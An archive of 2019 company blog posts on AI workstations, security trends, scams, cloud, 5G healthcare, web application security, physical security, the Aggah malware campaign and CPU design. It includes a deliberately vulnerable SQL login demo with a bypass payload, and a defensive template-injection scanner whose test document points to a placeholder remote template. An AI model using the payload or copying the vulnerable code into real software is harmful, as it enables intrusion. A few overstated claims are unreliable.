Most businesses have decided that AI is critically important for their competitiveness. They don't always know yet what kind of AI, and they often don't know how and where to get started, but they are making provisions for AI in their budget. And they are asking developers to start experimenting. Larger businesses can afford to recruit skilled developers, and smaller businesses ask their current team to develop the necessary skills. We are seeing a lot of trial and error among these businesses right now, some with fear and anxiety about success in AI and Machine Learning. Nevertheless, there is also a distinct urgency that drives these companies, as they do not want to fall behind.

Developers and programmers are working hard to get a good grasp of the machine learning and deep learning (DL) frameworks, increasing their data sets, and starting to develop models. Developers need free rein to bring this important new AI capability into the business, and the best way to achieve this is by giving them their own tools. Of course, those tools need to be suitable and strong enough for everything from simple ML tasks to heavy-duty tasks such as DL. A workstation with multiple powerful GPUs and a well-integrated, fully optimized stack is ideal for developers in this experimental stage. It allows them to get to production-scale deep learning much faster, which means that the business will start benefiting sooner from the models and algorithms they develop.

Putting an 8-GPU server in the office has scale and efficiency advantages, but it may well be unnecessary infrastructure at this stage for many organizations that are just starting to develop AI models. They may simply not be utilizing all those GPUs yet, and that would be a waste of money. A 4-GPU workstation is a nice midway point: half the GPUs at half the cost of a comparable 8-GPU server. The programmers can always decide to share the workstation among themselves by accessing it remotely. That's a good model for smaller businesses: they can justify the cost, ensure maximum utilization, and build their AI models on the workstation until they are ready for a primary role in the datacenter or other applications.

Acquiring personnel with AI expertise is challenging for most organizations. What can organizations that are just starting to make their foray into AI and Machine Learning do to attract these highly sought-after individuals?

True, the pool of AI talent is small. As a result, AI experts command top salaries, and they can be choosy about where and in what kind of environment they want to work. They are also very passionate about technology, and they get excited about tools that help them do their work better, faster and more flexibly. That is the reason why they want to work for companies like Google or for well-funded academic organizations that are building supercomputers. Having access to the best tools is an important motivation for these people.

So how do you get this talent for a smaller organization? AI experts do not want to be slowed down, waiting for a proper infrastructure model to run their research and development programs, when they know that there are tools that would allow them to do it much faster. They want to get to work right away on the stuff that really matters. A multi-GPU-accelerated workstation with a fully integrated and installed AI software stack under their desk will give them the compute power they desire. That will be a great start to get them interested in working for an SME (Small and Medium Enterprise).

07

May, 2019

Trends of the security world

It has been years since the concept of security came into being, and people started to realise that they needed to protect their sensitive systems and the information that those systems held. Over the years, various types of new technologies have emerged, and they have had their influence over the changes in the security industry. This blog talks about recent trends in the security industry.

Nowadays, a lot of advancement has occurred in the research behind mobile networks. By using cellular networks, one can communicate with anybody present anywhere in the world. Yet, for these versatile networks, security is an exceptionally big concern. Nowadays, firewalls and other safety measures are becoming more permeable as individuals are using devices, for example, tablets, telephones, PCs and so forth, all of which again require additional security controls apart from those present in the applications that they use. We should always consider the security issues of these mobile networks. A lot of care must be taken to protect these networks, as billions of people use them in their everyday lives. The risk of cyber-attacks on web servers and web applications to steal information or to disseminate malicious code still remains. Threat actors distribute their malicious code by means of legitimate web servers that they have hacked into. However, attacks through which information is stolen by attackers are likewise a major threat. A greater emphasis on securing web servers and web applications is required. Web servers in particular are the preferred platform for these cybercriminals for stealing information. APTs (Advanced Persistent Threats) are a whole new dimension of cyber threats. Network security controls such as web traffic filtering, IDS and others have had a key influence in recognising APT threats. As adversaries become smarter and use more sophisticated tricks and techniques, network security controls should be integrated with other types of security controls for detecting various APT attacks.
Encryption techniques have also been among the recent security trends. In an encryption technique, the message or data is scrambled using an encryption algorithm, transforming it into a form that is not human-readable. Encryption is used to secure data that is being transmitted or data that is stored on storage media. At the most basic level, encryption ensures the confidentiality and integrity of data. However, more use of encryption could also bring more difficulties. IPv6 is the new Internet protocol that is replacing IPv4, which has been the backbone of private networks and the Internet. Securing IPv6 isn't only a matter of porting IPv4 capabilities to IPv6 but also of how it will be implemented in networks around the world. While IPv6 is a straightforward replacement in terms of making more IP addresses available, there are some very essential changes to the protocol which should be considered in the security policies of organisations. These days various types of organisations are gradually embracing distributed computing or cloud computing. This most recent trend presents a major challenge for security professionals, as malicious web traffic can circumvent customary security measures. Moreover, as more and more applications are being made available in the cloud, security controls for web applications and the various types of cloud services that are offered via the cloud likewise should be improved so that there are lower risks of loss of important data. In spite of the fact that cloud providers are building up their own security models, there are still significant concerns regarding the security of the cloud and the data stored inside it.

06

May, 2019

Artificial Intelligence for Website Automation

Artificial intelligence is a known phenomenon in today's world. Its root began to grow years ago, but the tree began to grow long afterwards. Earlier a question arose everywhere, a question that targeted every known face and name in the field of artificial intelligence.

"Can artificial intelligence take over humans?"

Months ago, when our beloved Google Assistant made her first call to book a haircut appointment at the Google I/O event, the phenomenon shaped itself into a whole new form. Everyone is convinced that artificial intelligence, and now also machine learning, are gaining the power for full expansion.
This made us think in every direction about automation. Why not automate the process of making a website? Website business and building processes, static websites, CMS, Drupal, Hugo, WordPress, and the various languages involved, like HTML, JS, CSS and many more, have grown on a huge scale. Not everyone can learn everything, so implementing AI into it can change the face of the world. There are many reasons for using artificial intelligence in website development.

A BETTER UNDERSTANDING OF WHAT CUSTOMER NEEDS

Artificial intelligence combined with machine learning gives a better view of what people on your site seem to be looking for. It also keeps a record of what they don't want, and of anything that creates a problem. This will create customer awareness for owners, and they will be able to improve their products. If you own an e-commerce website and you know exactly what a customer wants, you'll make a profit. Constructive use of artificial intelligence will bring you profit in a neater way.

MAKING SEARCHES FASTER

Voice search is now the next big thing. Siri, Google Assistant, Cortana and other voice search software have a profound effect on internet searches and their speed. The voice search option has recently been used on many e-commerce websites. Also known as the virtual shopping assistant, it is popular among people of all ages, because even users who are farsighted can always give instructions by voice command. It is forecast that by 2021 all the largest e-commerce websites on the internet will use voice search to attract more and more customers.

BETTER INTERACTION

Since AI introduced the latest chatroom feature, the level of customer interaction has increased by a large percentage. With the development of artificial intelligence technology, chatrooms are becoming more natural. They are beginning to give a more human feeling. A customer doesn't have to search for everything himself: just type in the chatroom and voilà, the question is answered. Implementing this AI has visibly increased customer interaction in every business.

EFFECTIVE MARKETING

You'll know your target audience. You'll know which of your subscribers want what kind of products. Therefore, you can narrow down your marketing and eventually target each group accordingly:
What your customers like
What they don't like
What kind of devices are people using to reach your site?
What kind of channels are they using?
What is the ideal time to sell a product to a customer?

04

May, 2019

SCAM

We really want to trust that the Internet is a safe place, free from online scams of any kind, but a "reality check" is always a good thing.
We can be an easy target for malicious actors who want to steal our precious personal information.
Criminal minds can reach into our private lives, homes and workplaces more than ever these days, and we can do little about it. Attack tactics and devices vary between the traditional attack vector, which uses the most popular programs and applications (including the popular Windows operating systems) with malicious software and vulnerabilities, and ingenious phishing scams from unexpected places around the world in which justice never reaches the perpetrator.
Millennials in particular are more vulnerable to online scams than elderly people, Federal Trade Commission (FTC) reports say. "40 percent of adults 20 to 29 years of age who reported fraud finally lost money in fraud cases," the research concludes.
That is why we need to know the most popular techniques malicious actors use to gain unauthorised access to private information and financial information. We should not forget that their ultimate goal is our cash and that they will stop at nothing to fulfil their mission.

1. Phishing email scams

According to a new report by F-Secure, more than one third of all incidents begin with phishing emails or malicious attachments sent to employees. Phishing scams continue to evolve and are a major online threat to users and organisations, who can see valuable information end up in malicious actors' hands. Phishing can have a devastating effect, so it is important to stay safe and to learn how to detect and prevent these attacks. Phishing scams are based on e-mail or social network communication. In many cases, cybercriminals send users messages and e-mails trying to make them supply valuable and sensitive information that can prove worthwhile to the attackers (login credentials for a bank account, a social network, a work account, or cloud storage). In addition, these e-mails appear to be from an official source (such as banks or any other financial authority, or representatives of legitimate companies or social networks).

2. The Nigerian scam

Probably one of the oldest and most popular internet scams, used to trick people, mostly by someone posing as a member of a Nigerian family. It is also called "Nigerian 419", named after the section of Nigeria's criminal code that prohibits the practice. A typical Nigerian scam involves emotional letters, text messages or social network messages from a scammer who asks you to help move a large amount of money out of a bank, initially for small fees for paperwork and legal matters. The sender can be a government official, a businessman or a member of a very rich family, usually a female one. They promise you a very large sum in exchange for your assistance. You will continue to pay more and more for additional services like transactions or transfers. You will even receive papers to make you think it's all true. In the end, you are left broke, without the promised money.

3. Greeting card scams

We all get holiday cards from a friend or someone we care for in our email inbox, whether it's Christmas or Easter. Card scams are another old Internet scam that malicious actors use to inject malware and harvest users' most valuable data. Usually, when you open this email and click on the card, you download and install malicious software onto your OS. The malware could be an annoying program that starts pop-ups with unexpected windows all over the screen.

4. Bank loan or credit card scam

"Too good to be true" bank loans that guarantee large amounts of money and have already been pre-approved by the bank are easily used to scam people. When you receive such an incredible pre-approved loan, ask yourself, "How can a bank offer you so much money without even checking and analysing your financial situation?" Although this scam may seem unlikely to trap people, there are still a great many people who have lost money by paying the "obligatory" processing fees that the scammers require. With regard to credit card scams, the Identity Theft Resource Center has recently reported that last year there were increasing breaches of credit and debit card data. Consider monitoring your account statements carefully and monitoring your online transactions, taking advantage of free consumer protection services, and signing up for free credit monitoring to better protect your data and prevent thieves from accessing your payment card information.

5. Lottery scam

This is another classic scam on the Internet that appears never to get old. An email message tells you that you have won a lottery and that you have to pay a small fee to claim your prize or winnings. Lucky you, right?! You never remember buying lottery tickets. It does not even matter. As it addresses some of our wildest fantasies, such as leaving our job and living off our fortune for the rest of our lives without ever having to work again, we can easily find ourselves exposed to incredible scenarios that one can only dream of.

Conclusion:

Because some scams are really well organised and convincing, and it's so hard to catch the people behind them, we have to keep our guard up. Stay informed about the latest scam strategies.

03

May, 2019

Migrating to the cloud - Good or bad?

It has been ages since hard drives came into existence, and people have used them for storing all their data. The generation of storage devices started with floppy disks and magnetic drives and has reached a point where solid state drives have begun to take over the world of storage media. But this has also made storage devices more and more expensive, and with this, the era of cloud computing is starting to fall upon us. This blog discusses the shift towards cloud computing and whether it is a good or bad move for everyone.
Cloud computing includes resources, such as servers, storage devices, operating systems, etc., that can be made available on demand for users to use for multiple purposes. Users can use cloud computing for developing software, running web applications, storing their data, etc. Cloud computing can be deployed using various models, which include Infrastructure-as-a-Service (IaaS), Software-as-a-Service (SaaS) and Platform-as-a-Service (PaaS). IaaS involves cloud computing resources, such as servers, storage media and other networking features, that users can use straight away and that are provisioned and managed by the cloud provider. In SaaS, the cloud provider provisions the cloud customer with cloud software that the customer can use directly without worrying about the infrastructure or managing the software. PaaS involves the provisioning of a cloud environment by a cloud provider that customers can use to develop and deploy applications.
A lot of organisations have started to realise that storage has become very expensive nowadays, and that cloud solutions would help them reduce costs for their businesses. Moving to the cloud is definitely the right solution, and it also provides excellent mobility as people can access it from anywhere. This paradigm shift, though, can have several security risks attached to it. Data leaks and data breaches are viewed as the top threats to cloud computing, and the measures that are set up to mitigate them are interlinked. For instance, choosing to encrypt the data stored in the cloud can lessen the likelihood of a data leak; however, if the encryption key gets corrupted, then data loss could occur, as the data could no longer be decrypted. Conversely, keeping backups of cloud data can decrease the risk of data loss yet increase the risk of data exposure. The nature of cloud computing makes it hard to react to a security incident. People do not consider security when they develop new applications and deploy them in cloud infrastructures, and this can lead to security events. Furthermore, the vulnerabilities that also exist in servers in conventional data centres add to the risk to cloud services.
The proliferation of mobile devices that can access the cloud, and the increased reliance on cloud infrastructure without a strong cloud security strategy, increase the risk of data loss in the cloud. The lack of visibility into the practices that end users follow, and the lack of knowledge about the number of devices connected to a cloud, likewise increase this risk. The right security technologies and procedures need to be in place to ensure data protection while using cloud resources. Most organisations are bypassing security practices, for example, reviewing information about the assets present in the cloud and performing audits.
Cloud use is growing at a rapid pace and is frequently the only way companies can adapt to rapidly arising changes. The lack of data visibility in the cloud, alongside the lack of trust in the security practices of cloud providers, leads to reluctance about cloud adoption. There is a worry that the clients of a cloud provider would not be notified in a timely manner in the event of data leakage or loss, and there is a bigger fear that cloud providers don't have the necessary security mechanisms in place.
There is a requirement for enterprises to track their data as it goes into the cloud and to guarantee that the data is secured.

02

May, 2019

5G For Health Care

Traditionally, a complex regulatory environment and deeply embedded legacy systems have made the healthcare industry a laggard when it comes to adopting new technologies. But over the past several years, the proverbial floodgates have opened, with technological innovation transforming care and transforming lives. Healthcare technology is about to get another shot in the arm.
This year will bring the fifth generation of mobile internet connectivity, also known as 5G. The latest generation should deliver significant improvements in quality of care and patient experience, as well as lower costs and more operational efficiency.
5G will introduce an era of personalized, self-directed healthcare, empowering patients to better manage their health and medical conditions. Ultimately, healthcare goals are not limited to finding better treatment solutions; medical practitioners also strive to build preventive practices that avoid the need for treatment. 5G is going to make those goals a reality.
Wearable technologies consisting of continuous monitoring and sensory processing devices already help patients achieve wellness and independence. We have only scratched the surface of their potential, partly because of 4G limitations. One of the biggest challenges facing IoT solutions is slow network speeds due to congestion.
Providers interface with many patients every day, and transmitting large amounts of data on existing networks can be an incredibly slow process. Wearable devices require consistent, uniform and uninterrupted connectivity to be viable, and 5G will provide this connectivity at an unprecedented level.
5G technology has the potential to help healthcare organizations meet the growing demands of IoT-focused transformation by paving the way for more data to be shared, faster, across networks.
AT&T claims that its live 5G network has recently eclipsed the 1 gigabit-per-second mark, and the technology should theoretically be able to achieve download speeds of 10 Gbps with one millisecond of latency. Compare that with 4G's latency of 50 ms and speeds that average 15 megabits per second.
But speed is only part of 5G technology, which in every sense is superior to 4G. For starters, its lower latency will allow new and more advanced IoT applications that require rapid responsiveness, such as remote control of equipment.
In addition, 5G will revolutionize data management. The technology can handle large and vital data sets more efficiently, allowing information to be consolidated into one platform. 5G networks also have super-high bandwidth that will allow more people to transmit larger files without slowing things down.
Soon, 5G-powered remote monitoring tools will enable doctors not only to keep an eye on local patients, but also to attend to anyone around the world without having to leave the office. The telemedicine market is expected to grow at a compound annual rate of about 17 percent by 2023, according to a study by Market Research Future. Growth will be primarily due to government-driven healthcare initiatives and demand for better healthcare in rural areas. Unlike its predecessor, 5G will be able to support telehealth appointments' high-resolution video requirements.
This means that patients will have more accessible healthcare, including access to specialists who might otherwise be unavailable. 5G technology will enable medical professionals to quickly transmit massive files from X-ray machines, MRIs and other imaging machines. With immediate access to substantial data files, the people and machines charged with making critical decisions about patient health will be able to make them faster and with more information.
We have already seen that AI is capable of fully diagnosing patients and recommending proper treatment plans. It can also predict possible complications in outpatients, enabling care providers to implement preventive measures. But AI systems need massive amounts of data to learn and improve in real time, and that data typically comes from disparate sources and is delivered via mobile devices. In many cases, 4G has not been able to reliably support this continuous data flow; that won't be a problem for 5G.
Nevertheless, none of this is to say that, thanks to the next generation of connectivity, every healthcare problem will disappear. Seamless integration is far from guaranteed, but it is absolutely necessary if digital processes directly affect the health of individuals. Increasingly widespread concerns about patient privacy and the potential negative impact of data breaches in healthcare are well-founded and are not going anywhere. Security is imperative, especially when medical practitioners are transmitting medical data. It is also expensive to implement new technology. With the introduction of 5G, old devices and infrastructure elements may become incompatible. Replacing these devices will be expensive for providers. However, these issues will need to be ironed out with urgency. In an interview with HealthTech Insider, Dr. Joseph Kvedar, VP of Connected Health at Partners HealthCare, summed up nicely the implications of 5G for patient care: "If you place an Amazon order and it doesn't happen, the world doesn't stop. But if it's your pacemaker, it's a different matter."
While 5G technology has the potential to improve the way we deliver healthcare, providers need to be incredibly strategic about how they use this new technology. With a little caution and some creative problem-solving, the next generation of internet connectivity is sure to change things for the better.

30

April, 2019

Web Application Security

It is an era of interactive web resources that users can interact with to perform the tasks they want to do easily. These interactive resources that make various services available to users are called web applications. This blog talks about web applications and their security. It also talks about how attackers could take advantage of the weaknesses present in web applications to steal sensitive information, cause damage to financial assets, and have adverse effects on target organisations.
A web application is a type of website in which there is a two-way interaction between the user and the dynamically generated website. It is different from a traditional website in the sense that a regular website only has static content which the user can only read and not interact with. In the early days of the web, websites were entirely static collections of pages. User interaction was commonly limited to navigating between pages using hyperlinks. Progressively, the technology developed to allow greater levels of user interactivity. Web forms were, and still are, a familiar way a user can interact with a website. An example of a web application could be a social media website on which users can read and post information, make changes, and perform several other interactive tasks. Web applications are becoming increasingly common in various sectors, such as the public, Government and corporate sectors. This is because of the improvements in web-based technologies and the changing work environment. Although web applications are an easy and effective solution, they also bring various new security risks that, if not handled appropriately, could present critical dangers to an organisation's critical infrastructure. The rate at which web applications are being developed and deployed has made IT infrastructures more complex, and hence it has become more challenging to secure these infrastructures. Companies have relied on security controls at the edge of the network, for example, hardware firewalls, to secure their network environment. But, since an ever-increasing number of attacks are focusing on security weaknesses in web applications, for example, cross-site scripting vulnerabilities, it may not be adequate to secure web applications from such attacks using conventional network security practices.
If web applications are not developed while taking security into account at each step of the development lifecycle, then vulnerabilities could be left in the source code of the web applications that threat actors could leverage to attack the web applications using several types of web application attacks and steal user data or perform other malicious activities. The types of attacks that are possible on web applications vary according to the various aspects related to a web application. Some of the major types of web application attacks are injection attacks, cross-site scripting (XSS) attacks, cross-site request forgery (CSRF) attacks, attacks that take advantage of broken access controls in the web application, attacks that leverage the misconfigurations in the security features of the web application, and several more.
If an attacker manages to execute these web application attacks successfully against a target web application, then they could easily steal user credentials, bank account details, social media messages and other content, or even deface the target website. An example of such an attack is a SQL injection attack, in which an adversary crafts SQL that they enter into an input field, such as the username or password field on a website form, and through that attack gains access to an administrator account and deletes sensitive information stored in the target web application's database. This information could be all the user information stored in the database, or the whole database itself. Such an attack could cause a significant loss to the web application owners and also to the users of that web application. If, say, users' online bank account details were wiped from the database using a SQL injection attack, and they had a lot of money in their accounts, then that could cause a massive financial loss for the victims, and the bank whose web application had the SQL injection vulnerability would also get into a lot of trouble.
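As an added illustration that is not part of the original post, the login check below is written twice: once building the query by string concatenation, so that text typed into the username field becomes part of the SQL statement, and once as a parameterised query, which is the mitigation. The in-memory database, table, user and credential values are all constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed in-memory database for the example (not from the original post)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'example-secret', 'admin')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Vulnerable: the form fields are concatenated into the SQL text.

    Whatever the user types in the username field is parsed as SQL, so a
    value containing a closing quote and a comment marker removes the
    password comparison from the WHERE clause entirely.
    """
    query = ("SELECT role FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Hardened: a parameterised query.

    The SQL text is fixed and the values are bound separately by the driver,
    so the same input is compared literally against the stored username and
    is never interpreted as part of the statement.
    """
    row = conn.execute(
        "SELECT role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # A normal login works in both versions.
    print(login_vulnerable(db, "admin", "example-secret"))  # admin
    print(login_safe(db, "admin", "example-secret"))        # admin
    # A constructed username that closes the quoted string and comments out
    # the rest of the WHERE clause: only the vulnerable check is bypassed.
    crafted = "admin' --"
    print(login_vulnerable(db, crafted, "wrong"))           # admin
    print(login_safe(db, crafted, "wrong"))                 # None
```

Python's sqlite3 driver refuses to run more than one statement per execute() call, so the data-deletion case the paragraph describes cannot be reproduced with it; the parameterised form is the mitigation for both outcomes regardless of driver.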
Web applications are being used by more and more organisations each day, which also increases the probability of more vulnerabilities being exploited each day. As web applications hold critical data, securing them should be a priority task.

26

April, 2019

A glance into Physical Security

Organisations put in place expensive security controls to secure their network infrastructure from cyber-attacks. They implement hardware and software controls to prevent their critical IT assets from being compromised and sensitive information from being stolen. But what if someone comes in and takes the computer systems away with them? What if they steal the asset itself? Attackers come up with new tricks and techniques to break into buildings, steal physical property, cause damage to critical assets, or even harm the people who work at the target organisation. This blog talks about physical security and the implications of not having a proper physical security mechanism in place.
Physical security is the mechanism which security professionals help an organisation put in place to secure their tangible property and human resources. Physical security helps prevent any theft, destruction or obstruction in the functionality of the physical property. It also helps in the protection of a company's personnel against any physical attacks by threat actors. It is intended to keep up the ease of use and usefulness of the item under security. It may also mean administration by privately owned businesses who provide different types of protection mechanisms. The things that may require security can be hardware, vehicles, buildings, or people. Physical security utilises auxiliary and specialised offices and gear, for example, impenetrable glass, barricades, detours, video reconnaissance, etc.
There are numerous physical security threats present that can cause significant damage to organisations, their assets and personnel. Some of them are terrorism, theft and burglary, physical assaults, natural disasters, and vandalism. Terrorism affects homes, offices and even countries. Terrorism affects multiple aspects of physical security on almost equal levels. Terrorism can go to extents where there could be a total loss of physical building and assets. It can also cause loss of life of an organisation's personnel. Theft and burglary are the most common types of physical security attacks in the world. Attackers try various different methods to try and steal a company's physical assets. For example, a thief could come into a company's premises during off hours, and if the physical security measures are not appropriate, then the thief could easily steal some servers or workstation computers.
A company's employees could also face physical assaults by threat actors. For example, some people who want to enter the company's building might use physical force, such as beating up the guards to gain entry into the building. Physical assault is also one of the most prominent types of physical security threats that exist in the world. Natural disasters include earthquakes, floods, fires, hurricanes, tornadoes and all other natural phenomena that can damage tangible property. Natural disasters can cause massive financial losses to organisations if the organisations have not taken measures to make sure that their physical property can withstand such catastrophes.
Vandalism is a physical security threat which involves the intentional destruction of physical property. It can also include disfiguring an organisation's buildings and other physical property. An example of vandalism would be when attackers throw rocks to break window glasses of a company’s office building to cause physical and financial damage to the company.
Physical threats can become reasons for significant damage to both people and property. Hence, it is necessary that an organisation implements appropriate physical security controls to make sure that their physical assets and human resources are safe from adversaries, and away from any harm.

Read More

25

April, 2019

Windows Malware 'Aggah' Infects Your PC

The latest in a series of online attacks is 'Aggah', a global malware campaign with Middle East roots. ...
The campaign delivers a commodity Trojan through an infected Microsoft Word document. The perpetrators trick users into downloading and activating malicious code that installs RevengeRAT. Since RevengeRAT is built from several open source Trojan code bases, it is very difficult to identify the actual operator. The people involved use the alias 'aggah' for their operation.
How Does 'Aggah' Work?
A malware attack in the Aggah campaign consists of three major steps:
E-mail a Word doc titled 'Activity.doc' to the target
Prompt the user to enable content, which lets the document run its macros
A shell command launched by the macro fetches a Blogspot page that hosts further malicious scripts
The malware in the Aggah campaign works very discreetly, through a long chain of steps that are all initiated by a macro.
Weakness Being Exploited
The older binary formats (.doc, .ppt) have been replaced by the XML-based Office Open XML (OOXML) formats (.docx, .pptx). An OOXML file is a ZIP archive made up of 'parts', the XML files that together render the document when it is opened.
How the parts relate to one another is governed by relationship files, and a relationship may point at an external resource by URL. Attackers abuse this: when such a document is opened, Word fetches the remote resource, so Template Injection can load a malicious script in place of the harmless-looking document.
Template Injection: Template Injection is the technique of pointing a document's attached-template reference at an attacker-controlled server, so that a malicious template, including its macros, is loaded into an unsuspecting user's document when it is opened.
The latest Windows malware uses the following steps to exploit this feature:
The user receives an e-mail titled 'Your account is locked' with a Word document, 'Activity.doc', attached.
The document contains an image asking the user to 'view in desktop', 'Enable editing' and 'Enable Content'.
Enabling content is the goal. Once that happens, the document fetches and loads an OLE document from a remote server using Template Injection; that document contains an RTF (Rich Text Format) file.
The RTF embeds an Excel sheet containing a heavily obfuscated macro that runs a shell command to load a URL. The shell command downloads the contents of a Blogspot page.
The Blogspot page contains several scripts that disable Microsoft Defender and MS Office security functions by changing their settings.
The scripts then set key registry values of the MS Office applications to 1.
After that, the scripts disable Microsoft Office Protected View.
Finally, the scripts use Pastebin to download the malicious payload and run it through further shell commands.
This malware campaign targets financial institutions, government bodies, educational institutions, marketing agencies and others. The campaign was spotted by Unit 42, the threat research team at Palo Alto Networks.
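As an added example (not part of the original article or of Unit 42's research), the following Python scans a .docx for the relationship that Template Injection abuses. A .docx is a ZIP; the part word/_rels/settings.xml.rels is where an attached template is declared, and an External target there with an http(s) URL is what makes Word fetch a remote template on open. The sample document is constructed in memory, and the URL 203.0.113.5 is a documentation placeholder, not an indicator from the campaign.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OOXML_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Relationship types that make Office fetch and act on remote content when the
# document is opened; "attachedTemplate" is the one Template Injection abuses.
HIGH_RISK_TYPES = {"attachedTemplate", "oleObject"}
REMOTE_SCHEMES = {"http", "https", "ftp", "file"}


def find_remote_references(docx_bytes):
    """Walk every .rels part in the OOXML ZIP and return the relationships
    whose target is an external URL. Each finding records the part, the
    relationship type and whether Office would act on it automatically."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(RELS_NS + "Relationship"):
                if rel.get("TargetMode") != "External":
                    continue  # reference to another part inside the ZIP
                target = rel.get("Target", "")
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                scheme = urlparse(target).scheme.lower()
                if scheme in REMOTE_SCHEMES or target.startswith("\\\\"):
                    findings.append({
                        "part": name,
                        "type": rel_type,
                        "target": target,
                        "high_risk": rel_type in HIGH_RISK_TYPES,
                    })
    return findings


def is_template_injection(docx_bytes):
    """True when a relationship would make Word load a remote template or OLE object."""
    return any(f["high_risk"] for f in find_remote_references(docx_bytes))


def rels_xml(relationships):
    """Serialise (id, type suffix, target, external?) tuples as a .rels part."""
    body = "".join(
        '<Relationship Id="%s" Type="%s%s" Target="%s"%s/>'
        % (rid, OOXML_REL, rtype, target, ' TargetMode="External"' if external else "")
        for rid, rtype, target, external in relationships
    )
    return ('<?xml version="1.0" encoding="UTF-8"?>'
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            + body + "</Relationships>")


def build_sample_docx(template_url=None):
    """Constructed minimal .docx (not a real sample from the campaign). When
    template_url is given, settings.xml.rels points the attached template at
    it, which is exactly the structure a Template Injection lure carries."""
    settings_rels = []
    if template_url:
        settings_rels.append(("rId1", "attachedTemplate", template_url, True))
    document_rels = [
        ("rId1", "styles", "styles.xml", False),            # internal, benign
        ("rId2", "hyperlink", "https://example.com/", True), # external but inert
    ]
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/settings.xml",
                    '<?xml version="1.0"?><w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels", rels_xml(document_rels))
        zf.writestr("word/_rels/settings.xml.rels", rels_xml(settings_rels))
    return buf.getvalue()


if __name__ == "__main__":
    for f in find_remote_references(build_sample_docx("http://203.0.113.5/activity.dotm")):
        print(f)
```

Hyperlinks are also External relationships, so the scanner reports them but does not rate them high risk; only the types Word resolves on its own at open time are flagged. The same walk covers .xlsx and .pptx, since they share the OOXML packaging.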
How To Stay Safe?
Do not open Word documents like the one described above, and do not click 'Enable Content' in MS Word. If a suspicious document must be opened, open it in the web version of Office, where macros do not run.
Malware attacks have increased significantly in recent years. From pirated Game of Thrones episodes to Microsoft Word documents, anything that can attract heavy traffic is being laced with malware.
Several ransomware families have also caused havoc, especially in the industrial engineering sector, causing hundreds of thousands of dollars in damage. In addition, new types of ransomware are on the rise, some disguising themselves as PC enhancement tools while encrypting the user's files.

Read More

24

April, 2019

HOW CPUs ARE DESIGNED AND CONSTRUCTED

We all think of the CPU as a computer's "brains", but what does that mean? What happens inside your computer, among the trillions of transistors, to get work done? ...
In this new four-part mini-series we concentrate on computer hardware design, covering what makes a computer work. The series covers computer architecture, processor circuit design, VLSI (very large scale integration), chip fabrication and future trends in computing. If you have always wanted to know how processors work inside, stick around, because that is what this series is about.
We start at a very high level with what a processor does and how the building blocks fit together, including processor cores, the memory hierarchy, branch prediction, and more. First of all, we have to define what a CPU does. The simplest explanation is that a CPU follows a set of instructions to perform some operation on its input. For example, that could be reading a value from memory, adding it to another value, and saving the result back to memory at another location. It could also be something more complex, such as dividing two numbers only if the result of the previous calculation was greater than zero.
A program, whether an operating system or a game, is itself a series of instructions for the CPU to execute. These instructions are loaded from memory and, on a simple processor, executed one by one until the program completes. Software developers write their programs in high-level languages like C++ or Python, but the processor cannot understand these. It understands only 1s and 0s, so we need a format that represents code in that form.
Programs are compiled into a set of low-level instructions called assembly language, defined by an instruction set architecture (ISA). The CPU is designed to understand and execute these instructions. The most common ISAs are x86, MIPS, ARM, RISC-V and PowerPC. Just as the syntax of a C++ function differs from that of a Python function doing the same thing, each ISA has its own distinct syntax.
ISAs can be divided into two principal categories: fixed length and variable length. The RISC-V ISA uses fixed-length instructions, in which a predefined number of bits in each instruction determines what type of instruction it is. x86, by contrast, uses variable-length instructions: an x86 instruction can be encoded in various ways, with different parts of it using different numbers of bits. Because of this complexity, the instruction decoder in an x86 CPU is usually the most complicated part of the entire design.
Fixed-length instructions make decoding easier thanks to their regular structure, but they limit the total number of instructions an ISA can support. While the common versions of the RISC-V architecture have around 100 instructions and are open source, x86 is proprietary; it is generally believed to have several thousand instructions, but the exact number is not public. Despite their differences, all ISAs share the same core functionality.
Now we are ready to turn our computer on and start running things. Executing an instruction has several basic components, which are split across the many stages of a processor. The first step is to fetch the instruction from memory into the CPU. In the second step the instruction is decoded, so that the CPU can determine what type of instruction it is; the many types include arithmetic, branch and memory instructions. Once the CPU knows which type of instruction it is executing, the operands are gathered from memory or from the CPU's internal registers. If you want to add A to B, you cannot do the addition until you know the values of A and B. Most modern processors are 64-bit, which means each data value is 64 bits in size.
After the CPU has the operands, it moves to the execute stage, where the operation is performed on the input. This could be adding the numbers, performing a logical manipulation of them, or just passing them through unaltered. After the result is computed it may need to be stored in memory, or the CPU may just keep the value in one of its internal registers. Once the result is saved, the CPU updates the state of various elements and moves on to the next instruction.
Naturally, this description is an enormous simplification; most modern processors break these few steps into 20 or more smaller stages to improve efficiency. That means that although the processor starts and finishes several instructions each cycle, it may take 20 or more cycles for a single instruction to travel from start to finish. This model is usually called a pipeline, because it takes a while to fill the pipeline and for the liquid to pass fully through it.
